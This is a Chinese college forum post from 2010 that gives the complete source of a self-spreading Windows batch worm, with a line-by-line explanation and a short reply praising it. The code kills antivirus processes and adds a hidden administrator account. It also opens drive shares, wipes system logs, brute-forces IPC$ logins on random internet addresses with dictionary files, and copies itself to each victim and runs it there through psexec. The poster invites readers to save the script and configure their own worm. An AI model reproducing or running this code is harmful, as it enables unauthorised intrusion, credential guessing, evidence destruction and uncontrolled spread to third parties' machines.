周口职业技术学院论坛

标题: 分析一个用批处理编写的蠕虫 [打印本页]

作者: ml2010    时间: 2010-12-4 04:26
标题: 分析一个用批处理编写的蠕虫
源代码如下(把下面的代码保存为Rundll32.bat):
REM -----IPC Worm V2.0 -----
REM  ########################
REM 配置部分
SET addadmin=worm
SET SORI=1
SET ADDR1=254
SET ADDR2=254
SET ADDR3=254
SET ADDR4=254
SET WORM=Rundll32.bat
REM #######################
Copy /y %windir%\system32\%WORM% C:\Autoexec.bat
Copy /y %windir%\system32\%WORM% %windir%\system32\Winstart.bat
PSK Rfw.exe
PSK KAVPFW.exe
PSK KAV9X.exe
PSK VPC32.exe
PSK PFW.exe
PSK RavMon.exe
net user %addadmin% /add
IF %ERRORLEVEL%==0 net localgroup Administrators %addadmin% /add
net share ipc$
net share admin$
net share C$=c:\
net share D$=d:\
net share E$=e:\
net share F$=f:\
del %windir%\system32\logfiles\w3svc1\*.* /f /q
del %windir%\system32\logfiles\w3svc2\*.* /f /q
del %windir%\system32\config\*.event /f /q
del %windir%\system32dtclog\*.* /f /q
del %windir%\*.txt /f /q
del %windir%\*.log /f /q
:IPADDRESS
IF %SORI%==4 SET /A ADDR4=%RANDOM% %% %ADDR4%
IF %SORI%==3 (
SET /A ADDR3=%RANDOM% %% %ADDR3%
SET /A ADDR4=%RANDOM% %% %ADDR4%
)
IF %SORI%==2 (
SET /A ADDR2=%RANDOM% %% %ADDR2%
SET /A ADDR3=%RANDOM% %% %ADDR3%
SET /A ADDR4=%RANDOM% %% %ADDR4%
)
IF %SORI%==1 (
SET /A ADDR1=%RANDOM% %% %ADDR1%
SET /A ADDR2=%RANDOM% %% %ADDR2%
SET /A ADDR3=%RANDOM% %% %ADDR3%
SET /A ADDR4=%RANDOM% %% %ADDR4%
)   
SET ADDRESS=%ADDR1%.%ADDR2%.%ADDR3%.%ADDR4%
FOR /F %%K IN (%windir%\system32\U.txt) DO FOR /F %%J IN (%windir%\system32\P.txt) DO NET USE \\%ADDRESS%\IPC$ %%J /USER:%%K & IF NOT errorlevel 1 GOTO RUN
GOTO IPADDRESS
:RUN
COPY Rundll.bat \\%ADDRESS%\ADMIN$\SYSTEM32\%WORM%
IF errorlevel 1 GOTO ERR
COPY U.txt \\%ADDRESS%\ADMIN$\SYSTEM32\
COPY P.txt \\%ADDRESS%\ADMIN$\SYSTEM32\
COPY PS \\%ADDRESS%\ADMIN$\SYSTEM32\
COPY PSK \\%ADDRESS%\ADMIN$\SYSTEM32\
PS \\%ADDRESS% %windir%\system32\%WORM%
NET USE \\%ADDRESS%\IPC$ /DEL
GOTO IPADDRESS
这里面用到了pskill, psexec 这两个小工具和两个猜解用户密码的字典文件U.txt 和 P.txt。
这只蠕虫(IPC worm)的功能:
1、杀死本地杀毒程序的进程。(可以杀掉瑞星、金山、天网和赛门铁克。)
2、在本地添加一个用户,用户名可以自定义,密码为空。
3. 把自身复制到启动项。
4. 共享C D E F 盘。
4、随即生成一个IP地址。   (可以自由定义IP范围)
5、扫描弱口令。
7、复制自身到目标主机,并执行。
由于防止使用者恶意破坏。只编写了感染部分和传播部分,没有对破坏部分进行编写。现在只可以定义为一条共享蠕虫。
分析:
REM 配置部分
REM addadmin=worm
你要建立的用户,默认为worm
SET ADDR1=254
循环IP第一部分
SET ADDR2=254
循环IP第二部分
SET ADDR3=254
循环IP第三部分
SET ADDR4=254
循环IP第四部分
SET SORI=1
随机开关,如果是4则以第四部分为上限,生成192.168.0.1—192.168.0.255中的随机地址,如果为3,则第三部分和第四部分都是随机,以此类推。默认为0.0.0.0-254.254.254.254之内的随机IP,也就是全世界,当然大家可以自己配置IP范围。
SET WORM=Rundll32.bat
定义蠕虫的名称,默认为Rundll32.bat。
这一段为配置部分,大家可以根据自己的需求和喜好配置自己的小虫虫。下面开始对这个蠕虫的行为进行分析。
Copy /y %windir%\system32\%WORM% C:\Autoexec.bat
Copy /y %windir%\system32\%WORM% %windir%\system32\Winstart.bat
把自身复制到启动项Autoexec.bat和Winstart.bat中,双保险,呵呵,够黑吧!
PSK Rfw.exe
PSK KAVPFW.exe
PSK KAV9X.exe
PSK VPC32.exe
PSK PFW.exe
PSK RavMon.exe
杀掉反病毒进程,用到了pkill这个小工具,这里改名为PSK。
net user %addadmin% /add
IF %ERRORLEVEL%==0 net localgroup Administrators %addadmin% /add
建立你所要建立的用户名,并把其加入管理员组。
net share ipc$
net share admin$
net share C$=c:\
net share D$=d:\
net share E$=e:\
net share F$=f:\
共享C D E F 盘。当然你还可以再添加。格式:net share 共享名=共享硬盘。
del %windir%\system32\logfiles\w3svc1\*.* /f /q
del %windir%\system32\logfiles\w3svc2\*.* /f /q
del %windir%\system32\config\*.event /f /q
del %windir%\system32dtclog\*.* /f /q
del %windir%\*.txt /f /q
del %windir%\*.log /f /q
清除所有日志,呵呵,管理员不要吐血哦
下面就到了精彩的传播部分
:IPADDRESS
IF %SORI%==4 SET /A ADDR4=%RANDOM% %% %ADDR4%
IF %SORI%==3 (
SET /A ADDR3=%RANDOM% %% %ADDR3%
SET /A ADDR4=%RANDOM% %% %ADDR4%
)
IF %SORI%==2 (
SET /A ADDR2=%RANDOM% %% %ADDR2%
SET /A ADDR3=%RANDOM% %% %ADDR3%
SET /A ADDR4=%RANDOM% %% %ADDR4%
)
IF %SORI%==1 (
SET /A ADDR1=%RANDOM% %% %ADDR1%
SET /A ADDR2=%RANDOM% %% %ADDR2%
SET /A ADDR3=%RANDOM% %% %ADDR3%
SET /A ADDR4=%RANDOM% %% %ADDR4%
)   
SET ADDRESS=%ADDR1%.%ADDR2%.%ADDR3%.%ADDR4%
随机生成IP地址,如果SORI的值为1,则循环IP第四部分,如果SORI的值为2,则循环IP第四部分和第三部分,依此类推。ADDRESS定义为随机IP部分的这里用到了RANDOM这个随机函数,建议大家看看Windows的帮助。

FOR /F %%K IN (%windir%\system32\U.txt) DO FOR /F %%J IN (%windir%\system32\P.txt) DO NET USE \\%ADDRESS%\IPC$ %%J /USER:%%K & IF NOT errorlevel 1 GOTO RUN
GOTO IPADDRESS (也就是重新随机定义IP)
呵呵,绝对经典的一句,用了For的双层循环猜解用户名和密码(U.txt为用户字典,P.txt为密码字典),如果正确GOTO RUN,错误GOTO IPADDRESS。建议大家好好琢磨琢磨这一句话。
:RUN
COPY Rundll.bat \\%ADDRESS%\ADMIN$\SYSTEM32\%WORM%
IF errorlevel 1 GOTO ERR
COPY U.txt \\%ADDRESS%\ADMIN$\SYSTEM32\
COPY P.txt \\%ADDRESS%\ADMIN$\SYSTEM32\
COPY PS \\%ADDRESS%\ADMIN$\SYSTEM32\
COPY PSK \\%ADDRESS%\ADMIN$\SYSTEM32\
PS \\%ADDRESS% %windir%\system32\%WORM%
RUN部分,建立IPC$成功后把自身复制到目标IP的SYSTEM32目录下,并用psexec远程执行蠕虫主体(这里为PS)。
NET USE \\%ADDRESS%\IPC$ /DEL
GOTO IPADDRESS
删除IPC$联接
作者: 0的123    时间: 2011-4-10 00:56
看着就分析的很好。。。。。。。。




欢迎光临 周口职业技术学院论坛 (http://zkvtc.com/) Powered by Discuz! X2.5